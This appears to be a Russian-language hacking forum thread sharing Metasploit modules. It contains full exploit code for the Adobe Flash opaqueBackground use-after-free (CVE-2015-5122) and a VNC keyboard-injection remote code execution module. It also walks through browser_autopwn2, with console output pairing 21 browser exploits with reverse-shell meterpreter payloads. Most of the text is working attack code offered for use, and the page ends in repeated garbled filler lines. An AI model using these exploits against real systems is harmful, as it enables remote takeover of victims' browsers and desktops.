# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking

include Msf::Exploit::Remote::BrowserExploitServer

def initialize(info={})
super(update_info(info,
'Name' => 'Adobe Flash opaqueBackground Use After Free',
'Description' => %q{
This module exploits an use after free on Adobe Flash Player. The vulnerability,
discovered by Hacking Team and made public on its July 2015 data leak, was
described as an Use After Free while handling the opaqueBackground property
7 setter of the flash.display.DisplayObject class. This module is an early release
tested on:

Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.203,
Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.194,
Windows 7 SP1 (32-bit), IE9 and Adobe Flash Flash 18.0.0.203,
Windows 7 SP1 (32-bit), Firefox + Adobe Flash 18.0.0.194,
windows 8.1, Firefox and Adobe Flash 18.0.0.203,
Windows 8.1, Firefox and Adobe Flash 18.0.0.160, and
Windows 8.1, Firefox and Adobe Flash 18.0.0.194
},
'License' => MSF_LICENSE,
'Author' =>
[
'Unknown', # Vulnerability discovered on HackingTeam info leak
'juan vazquez', # Ported to Msf
'sinn3r' # Testing and some editing
],
'References' =>
[
['CVE', '2015-5122'],
['URL', 'https://www.fireeye.com/blog/threat-research/2015/07/cve-2015-5122_-_seco.html']
],
'Payload' =>
{
'DisableNops' => true
},
'Platform' => ['win'],
'Arch' => [ARCH_X86],
'BrowserRequirements' =>
{
:source => /script|headers/i,
:arch => ARCH_X86,
:os_name => lambda do |os|
os =~ OperatingSystems::Match::WINDOWS_7 ||
os =~ OperatingSystems::Match::WINDOWS_81
end,
:ua_name => lambda do |ua|
case target.name
when 'Windows'
return true if ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF
end

false
end,
:flash => lambda do |ver|
case target.name
when 'Windows'
return true if ver =~ /^18./ && Gem::Version.new(ver) <= Gem::Version.new('18.0.0.203')
end

false
end
},
'Targets' =>
[
[ 'Windows',
{
'Platform' => 'win'
}
]
],
'Privileged' => false,
'DisclosureDate' => 'Jul 06 2015',
'DefaultTarget' => 0))
end

def exploit
@swf = create_swf

super
end

def on_request_exploit(cli, request, target_info)
print_status("Request: #{request.uri}")

if target_info[:os_name] =~ OperatingSystems::Match::WINDOWS_81 && target_info[:ua_ver] == '11.0'
print_warning("Target setup not supported")
send_not_found(cli)
return
end

if request.uri =~ /.swf$/
print_status('Sending SWF...')
send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
return
end

print_status('Sending HTML...')
send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
end

def exploit_template(cli, target_info)
swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
target_payload = get_payload(cli, target_info)
b64_payload = Rex::Text.encode_base64(target_payload)
os_name = target_info[:os_name]

if target.name =~ /Windows/
platform_id = 'win'
end

html_template = %Q|<html>
<body>
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
<param name="movie" value="<%=swf_random%>" />
<param name="allowScriptAccess" value="always" />
<param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" />
<param name="Play" value="true" />
<embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" Play="true"/>
</object>
</body>
</html>
|

return html_template, binding()
end

def create_swf
path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-5122', 'msf.swf')
swf = ::File.open(path, 'rb') { |f| swf = f.read }

swf
end
end

DarckSol · 17.07.2015

Вчера в обновлениях метасплоита выловил новый модуль....

auxiliary/server/browser_autopwn

у нас уже был чуть ли ни с самого начала проекта, а вот

auxiliary/server/browser_autopwn2

ток появился..., и так, запустим его и глянем что внутри...:

собственно мы видим из описания, что это очередной миксер эксплоитов.....

Произведём минимальные настройки, укажем srvhost, это то место, куда будут заходить люди, для проверки своих браузеров на возможные уязвимости. Так же можно задать srvport, это порт, на котором поднимется сервис модуля, а так же uripach, это дополнительная ссылка к IP/domen'у ... 127.0.0.1/uripach... По умолчанию оно генерируется случайно.

И так, запустим...

msf auxiliary(browser_autopwn2) > run
[*] Starting exploit modules...
[*] Starting listeners...
[*] Time spent: 6.185966114...
[*] Starting the payload handler...
[*] Using URL: http://localhost:8080/x5Y9NfXmx7zbY

[*] The following is a list of exploits that BrowserAutoPwn will consider using.
[*] Exploits with the highest ranking and newest will be tried first.

Exploits
========

Order Rank Name Payload
----- ---- ---- -------
1 Excellent firefox_svg_plugin firefox/shell_reverse_tcp on 4442
2 Excellent samsung_knox_smdm_url android/meterpreter/reverse_tcp on 4443
3 Excellent webview_addjavascriptinterface android/meterpreter/reverse_tcp on 4443
4 Excellent firefox_webidl_injection firefox/shell_reverse_tcp on 4442
5 Excellent firefox_tostring_console_injection firefox/shell_reverse_tcp on 4442
6 Excellent firefox_proto_crmfrequest firefox/shell_reverse_tcp on 4442
7 Great adobe_flash_hacking_team_uaf windows/meterpreter/reverse_tcp on 4444
8 Great adobe_flash_nellymoser_bof windows/meterpreter/reverse_tcp on 4444
9 Great adobe_flash_shader_job_overflow windows/meterpreter/reverse_tcp on 4444
10 Great adobe_flash_shader_drawing_fill windows/meterpreter/reverse_tcp on 4444
11 Great adobe_flash_worker_byte_array_uaf windows/meterpreter/reverse_tcp on 4444
12 Great adobe_flash_domain_memory_uaf windows/meterpreter/reverse_tcp on 4444
13 Great adobe_flash_casi32_int_overflow windows/meterpreter/reverse_tcp on 4444
14 Great adobe_flash_pixel_bender_bof windows/meterpreter/reverse_tcp on 4444
15 Great adobe_flash_net_connection_confusion windows/meterpreter/reverse_tcp on 4444
16 Great adobe_flash_copy_pixels_to_byte_array windows/meterpreter/reverse_tcp on 4444
17 Great adobe_flash_uncompress_zlib_uaf windows/meterpreter/reverse_tcp on 4444
18 Good ms14_064_ole_code_execution windows/meterpreter/reverse_tcp on 4444
19 Good adobe_flash_uncompress_zlib_uninitialized windows/meterpreter/reverse_tcp on 4444
20 Good wellintech_kingscada_kxclientdownload windows/meterpreter/reverse_tcp on 4444
21 Normal adobe_flash_opaque_background_uaf windows/meterpreter/reverse_tcp on 4444

[ + ] Please use the following URL for the browser attack:
[ + ] BrowserAutoPwn URL: http://localhost:8080/x5Y9NfXmx7zbY
[*] Server started.
[*] Starting the payload handler...

и видим вот такую картину, на одной ссылке подвешн 21 эксплоит для браузеров....

После этого переходим по ссылке

[ + ] BrowserAutoPwn URL: http://localhost:8080/x5Y9NfXmx7zbY

и наблюдаем, как модуль метасплоита распознает Ваш браузер и выдаст нужный набор експлоитов.

Всем удачи, и помните про УК РФ

DarckSol · 26.07.2015

VNC Keyboard Remote Code Execution

Код:

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
require 'rex/proto/rfb'
 
class Metasploit3 < Msf::Exploit::Remote
 
  Rank = GreatRanking
  WINDOWS_KEY = "\xff\xeb"
  ENTER_KEY = "\xff\x0d"
 
  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::CmdStager
  include Msf::Exploit::Powershell
 
  def initialize(info = {})
    super(update_info(info,
      'Name'            => 'VNC Keyboard Remote Code Execution',
      'Description'     => %q{
        This module exploits VNC servers by sending virtual keyboard keys and executing
        a payload. On Windows systems a command prompt is opened and a PowerShell or CMDStager
        payload is typed and executed. On Unix/Linux systems a xterm terminal is opened
        and a payload is typed and executed.
      },
      'Author'          => [ 'xistence <xistence[at]0x90.nl>' ],
      'Privileged'      => false,
      'License'         => MSF_LICENSE,
      'Platform'       => %w{ win unix },
      'Targets'         =>
        [
          [ 'VNC Windows / Powershell', { 'Arch' => ARCH_X86, 'Platform' => 'win' } ],
          [ 'VNC Windows / VBScript CMDStager', { 'Platform' => 'win' } ],
          [ 'VNC Linux / Unix', { 'Arch' => ARCH_CMD, 'Platform' => 'unix' } ]
        ],
      'References'     =>
        [
          [ 'URL', 'http://www.jedi.be/blog/2010/08/29/sending-keystrokes-to-your-virtual-machines-using-X-vnc-rdp-or-native/']
        ],
      'DisclosureDate'  => 'Jul 10 2015',
      'DefaultTarget'   => 0))
 
    register_options(
      [
        Opt::RPORT(5900),
        OptString.new('PASSWORD', [ false, 'The VNC password']),
        OptInt.new('TIME_WAIT', [ true, 'Time to wait for payload to be executed', 20])
      ], self.class)
  end
 
 
  def press_key(key)
    keyboard_key = "\x04\x01" # Press key
    keyboard_key << "\x00\x00\x00\x00" # Unknown / Unused data
    keyboard_key << key # The keyboard key
    # Press the keyboard key. Note: No receive is done as everything is sent in one long data stream
    sock.put(keyboard_key)
  end
 
 
  def release_key(key)
    keyboard_key = "\x04\x00" # Release key
    keyboard_key << "\x00\x00\x00\x00" # Unknown / Unused data
    keyboard_key << key # The keyboard key
    # Release the keyboard key. Note: No receive is done as everything is sent in one long data stream
    sock.put(keyboard_key)
  end
 
 
  def exec_command(command)
    values = command.chars.to_a
    values.each do |value|
      press_key("\x00#{value}")
      release_key("\x00#{value}")
    end
    press_key(ENTER_KEY)
  end
 
 
  def start_cmd_prompt
    print_status("#{rhost}:#{rport} - Opening Run command")
    # Pressing and holding windows key for 1 second
    press_key(WINDOWS_KEY)
    Rex.select(nil, nil, nil, 1)
    # Press the "r" key
    press_key("\x00r")
    # Now we can release both keys again
    release_key("\x00r")
    release_key(WINDOWS_KEY)
    # Wait a second to open run command window
    select(nil, nil, nil, 1)
    exec_command('cmd.exe')
    # Wait a second for cmd.exe prompt to open
    Rex.select(nil, nil, nil, 1)
  end
 
 
  def exploit
 
    begin
      alt_key = "\xff\xe9"
      f2_key = "\xff\xbf"
      password = datastore['PASSWORD']
 
      connect
      vnc = Rex::Proto::RFB::Client.new(sock, :allow_none => false)
 
      unless vnc.handshake
        fail_with(Failure::Unknown, "#{rhost}:#{rport} - VNC Handshake failed: #{vnc.error}")
      end
 
      if password.nil?
        print_status("#{rhost}:#{rport} - Bypass authentication")
        # The following byte is sent in case the VNC server end doesn't require authentication (empty password)
        sock.put("\x10")
      else
        print_status("#{rhost}:#{rport} - Trying to authenticate against VNC server")
        if vnc.authenticate(password)
          print_status("#{rhost}:#{rport} - Authenticated")
        else
          fail_with(Failure::NoAccess, "#{rhost}:#{rport} - VNC Authentication failed: #{vnc.error}")
        end
      end
 
      # Send shared desktop
      unless vnc.send_client_init
        fail_with(Failure::Unknown, "#{rhost}:#{rport} - VNC client init failed: #{vnc.error}")
      end
 
      if target.name =~ /VBScript CMDStager/
        start_cmd_prompt
        print_status("#{rhost}:#{rport} - Typing and executing payload")
        execute_cmdstager({:flavor => :vbs, :linemax => 8100})
        # Exit the CMD prompt
        exec_command('exit')
      elsif target.name =~ /Powershell/
        start_cmd_prompt
        print_status("#{rhost}:#{rport} - Typing and executing payload")
        command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {remove_comspec: true, encode_final_payload: true})
        # Execute powershell payload and make sure we exit our CMD prompt
        exec_command("#{command} && exit")
      elsif target.name =~ /Linux/
        print_status("#{rhost}:#{rport} - Opening 'Run Application'")
        # Press the ALT key and hold it for a second
        press_key(alt_key)
        Rex.select(nil, nil, nil, 1)
        # Press F2 to start up "Run application"
        press_key(f2_key)
        # Release ALT + F2
        release_key(alt_key)
        release_key(f2_key)
        # Wait a second for "Run application" to start
        Rex.select(nil, nil, nil, 1)
        # Start a xterm window
        print_status("#{rhost}:#{rport} - Opening xterm")
        exec_command('xterm')
        # Wait a second for "xterm" to start
        Rex.select(nil, nil, nil, 1)
        # Execute our payload and exit (close) the xterm window
        print_status("#{rhost}:#{rport} - Typing and executing payload")
        exec_command("nohup #{payload.encoded} &")
        exec_command('exit')
      end
 
      print_status("#{rhost}:#{rport} - Waiting for session...")
      (datastore['TIME_WAIT']).times do
        Rex.sleep(1)
 
        # Success! session is here!
        break if session_created?
      end
 
    rescue ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout => e
      fail_with(Failure::Unknown, "#{rhost}:#{rport} - #{e.message}")
    ensure
      disconnect
    end
  end
 
  def execute_command(cmd, opts = {})
    exec_command(cmd)
  end
 
end

Модули для Metasploit Framework

(L1) cache

(L1) cache

(L1) cache

(L1) cache

(L1) cache

(L1) cache

(L1) cache

(L1) cache

(L1) cache

RAID-массив

RAID-массив

RAID-массив

(L1) cache

(L1) cache

(L1) cache

RAID-массив

RAID-массив

RAID-массив

(L1) cache

(L1) cache